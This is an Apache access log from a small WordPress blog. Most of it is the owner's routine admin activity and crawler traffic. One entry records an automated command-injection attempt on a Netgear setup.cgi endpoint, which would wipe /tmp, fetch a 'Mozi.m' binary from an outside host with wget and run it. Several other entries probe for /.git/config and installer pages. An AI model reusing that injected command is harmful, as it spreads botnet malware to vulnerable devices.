43.130.139.136 - - [01/Jul/2026:18:40:58 -0400] "GET /2026/07/01/hello-world/ HTTP/1.1" 200 11670 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [01/Jul/2026:18:41:03 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
107.13.46.68 - - [01/Jul/2026:18:41:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:42:11 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:42:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:43:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:44:12 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:44:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
::1 - - [01/Jul/2026:18:45:40 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
107.13.46.68 - - [01/Jul/2026:18:45:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
::1 - - [01/Jul/2026:18:45:59 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
::1 - - [01/Jul/2026:18:46:01 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
107.13.46.68 - - [01/Jul/2026:18:46:13 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:46:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:47:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:48:14 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
43.131.36.84 - - [01/Jul/2026:18:48:28 -0400] "GET / HTTP/1.1" 200 8854 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
107.13.46.68 - - [01/Jul/2026:18:48:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:49:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:50:15 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
49.51.204.74 - - [01/Jul/2026:18:50:38 -0400] "GET /wp-json/ HTTP/1.1" 200 192375 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
107.13.46.68 - - [01/Jul/2026:18:50:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
104.23.217.41 - - [01/Jul/2026:18:51:04 -0400] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 901 "-" "http://vcatroverclub.com/wp-admin/install.php?step=1"
107.13.46.68 - - [01/Jul/2026:18:51:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:18:52:16 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
::1 - - [01/Jul/2026:18:52:30 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
::1 - - [01/Jul/2026:18:53:21 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
37.120.205.5 - - [01/Jul/2026:19:00:51 -0400] "POST /wp-cron.php?doing_wp_cron=1782946851.2573640346527099609375 HTTP/1.1" 200 259 "-" "WordPress/7.0; http://drivebackmachine.net"
43.155.27.244 - - [01/Jul/2026:19:00:51 -0400] "GET /xmlrpc.php HTTP/1.1" 405 238 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [01/Jul/2026:19:02:16 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
49.51.36.179 - - [01/Jul/2026:19:10:32 -0400] "GET /feed/ HTTP/1.1" 200 1308 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET / HTTP/1.1" 200 8886 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/css/style-mobile.css?ver=1.0 HTTP/1.1" 200 2178 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/style.css?ver=7.0 HTTP/1.1" 200 7640 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/js/hoverIntent.js?ver=20130729 HTTP/1.1" 200 1958 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/js/jquery.fitvids.js?ver=20130729 HTTP/1.1" 200 1530 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/js/superfish.js?ver=20130729 HTTP/1.1" 200 2718 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/css/font-awesome.css?ver=1.0 HTTP/1.1" 200 6761 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/uploads/2026/07/Gemini_Generated_Image_zadh6ezadh6ezadh-1536x1536.png HTTP/1.1" 304 251 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/uploads/2026/07/Driveback-machine-7-1-2026.png HTTP/1.1" 304 251 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/js/jquery.custom.js?ver=20130729 HTTP/1.1" 200 1142 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/js/navigation.js?ver=20130729 HTTP/1.1" 200 857 "http://drivebackmachine.net/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:15:17 -0400] "GET /wp-content/themes/90s-retro/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 304 249 "http://drivebackmachine.net/wp-content/themes/90s-retro/css/font-awesome.css?ver=1.0" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
::1 - - [01/Jul/2026:19:15:24 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
::1 - - [01/Jul/2026:19:15:25 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
::1 - - [01/Jul/2026:19:15:40 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
::1 - - [01/Jul/2026:19:15:44 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
107.13.46.68 - - [01/Jul/2026:19:17:05 -0400] "-" 408 0 "-" "-"
107.13.46.68 - - [01/Jul/2026:19:17:05 -0400] "-" 408 0 "-" "-"
114.236.2.24 - - [01/Jul/2026:19:19:00 -0400] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://114.236.2.243:49003/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 32438 "-" "-"
209.38.91.17 - - [01/Jul/2026:19:20:48 -0400] "GET /.git/config HTTP/1.1" 404 32574 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.166.136.153 - - [01/Jul/2026:19:21:36 -0400] "GET / HTTP/1.1" 200 8849 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
37.120.205.5 - - [01/Jul/2026:19:28:29 -0400] "POST /wp-cron.php?doing_wp_cron=1782948509.4223220348358154296875 HTTP/1.1" 200 259 "-" "WordPress/7.0; http://drivebackmachine.net"
43.157.62.101 - - [01/Jul/2026:19:28:29 -0400] "GET / HTTP/1.1" 200 8849 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.62.213.165 - - [01/Jul/2026:19:30:44 -0400] "GET /category/uncategorized/ HTTP/1.1" 200 7177 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
31.59.160.12 - - [01/Jul/2026:19:32:17 -0400] "GET /SDK/webLanguage HTTP/1.1" 301 366 "-" "Mozilla/5.0"
150.109.46.88 - - [01/Jul/2026:19:39:45 -0400] "GET /comments/feed/ HTTP/1.1" 200 1131 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [01/Jul/2026:19:42:28 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
43.153.15.51 - - [01/Jul/2026:19:44:27 -0400] "GET / HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.15.51 - - [01/Jul/2026:19:44:28 -0400] "GET / HTTP/1.1" 200 8854 "http://107.13.46.68:80" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.14.81.106 - - [01/Jul/2026:19:47:44 -0400] "GET / HTTP/1.1" 200 8854 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.123.4 - - [01/Jul/2026:19:50:41 -0400] "GET /2026/07/ HTTP/1.1" 200 7015 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
107.13.46.68 - - [01/Jul/2026:19:51:38 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:52:38 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:54:39 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:56:40 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 653 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
37.120.205.5 - - [01/Jul/2026:19:57:32 -0400] "POST /wp-cron.php?doing_wp_cron=1782950252.4552869796752929687500 HTTP/1.1" 200 259 "-" "WordPress/7.0; http://drivebackmachine.net"
107.13.46.68 - - [01/Jul/2026:19:57:32 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 704 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:37 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 663 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:37 -0400] "GET / HTTP/1.1" 200 10491 "http://drivebackmachine.net/wp-admin/customize.php?url=http%3A%2F%2Fdrivebackmachine.net%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-includes/css/admin-bar.min.css?ver=7.0 HTTP/1.1" 200 4234 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/style.css?ver=7.0 HTTP/1.1" 200 7640 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/css/style-mobile.css?ver=1.0 HTTP/1.1" 200 2179 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/js/jquery.fitvids.js?ver=20130729 HTTP/1.1" 200 1529 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/uploads/2026/07/Gemini_Generated_Image_zadh6ezadh6ezadh-1024x1024.png HTTP/1.1" 304 252 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/js/hoverIntent.js?ver=20130729 HTTP/1.1" 200 1958 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/css/font-awesome.css?ver=1.0 HTTP/1.1" 200 6760 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/js/superfish.js?ver=20130729 HTTP/1.1" 200 2719 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/uploads/2026/07/Driveback-machine-7-1-2026.png HTTP/1.1" 304 250 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/js/jquery.custom.js?ver=20130729 HTTP/1.1" 200 1142 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/js/navigation.js?ver=20130729 HTTP/1.1" 200 857 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:38 -0400] "GET /wp-content/themes/90s-retro/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 304 249 "http://drivebackmachine.net/wp-content/themes/90s-retro/css/font-awesome.css?ver=1.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-admin/ HTTP/1.1" 200 21321 "http://drivebackmachine.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-includes/css/editor.min.css?ver=7.0 HTTP/1.1" 200 6342 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-admin/js/site-health.min.js?ver=7.0 HTTP/1.1" 200 2599 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-includes/js/jquery/jquery.query.js?ver=2.2.3 HTTP/1.1" 200 1970 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-admin/js/edit-comments.min.js?ver=7.0 HTTP/1.1" 200 5528 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,wp-base-styles,buttons,wp-auth-check,wp-components,wp-commands&ver=7.0 HTTP/1.1" 200 119783 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-admin/js/dashboard.min.js?ver=7.0 HTTP/1.1" 200 3432 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-admin/js/plugin-install.min.js?ver=7.0 HTTP/1.1" 200 1364 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:39 -0400] "GET /wp-content/themes/90s-retro/includes/persist-admin-notices-dismissal/dismiss-notice.js?ver=7.0 HTTP/1.1" 200 760 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:40 -0400] "GET /wp-admin/plugins.php HTTP/1.1" 200 15079 "http://drivebackmachine.net/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 703 "http://drivebackmachine.net/wp-admin/post.php?post=1&action=edit" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:42 -0400] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 18238 "http://drivebackmachine.net/wp-admin/plugins.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
::1 - - [01/Jul/2026:19:57:50 -0400] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 (internal dummy connection)"
107.13.46.68 - - [01/Jul/2026:19:57:53 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 112720 "http://drivebackmachine.net/wp-admin/plugin-install.php?s=Advanced%2520Custom%2520Fields&tab=search&type=term" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
107.13.46.68 - - [01/Jul/2026:19:57:56 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1104 "http://drivebackmachine.net/wp-admin/plugin-install.php?s=Advanced%2520Custom%2520Fields&tab=search&type=term" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36"
